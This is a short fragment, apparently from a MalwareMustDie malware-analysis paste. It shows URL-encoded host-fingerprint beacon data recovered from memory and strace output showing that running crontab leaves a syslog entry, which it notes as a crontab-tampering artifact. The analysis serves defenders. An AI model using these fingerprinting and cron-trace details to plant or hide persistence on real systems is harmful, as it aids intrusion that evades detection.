0xc420055238  xxxxxxx+%231+SMP+xxxxxxxxxxxxxx+x86_64+GNU%2FLinux%0A&amp;version=1&amp;whoami=nyan_apt%0A..... 

// crontab tampering artifact: running crontab -l leaves a LIST entry in syslog (sent via /dev/log)

munmap(0x7f75952fb000, 4096)      = 0
socket(PF_FILE, SOCK_DGRAM|SOCK_CLOEXEC, 0) = 3
connect(3, {sa_family=AF_FILE, path=&quot;/dev/log&quot;}, 110) = 0
sendto(3, &quot;&lt;78&gt;Jan 10 07:55:51 crontab[2547]: (test) LIST (test)&quot;, 53, MSG_NOSIGNAL, NULL, 0) = 53


---
# MalwareMustDie! - Don&#039;t spread malware - spread LOVE! @unixfreaxjp</textarea>
    
        
</div>            <div style="clear: both;"></div>

                        
        </div>

    </div>
</div>


    

    


    
    


</body>
</html>
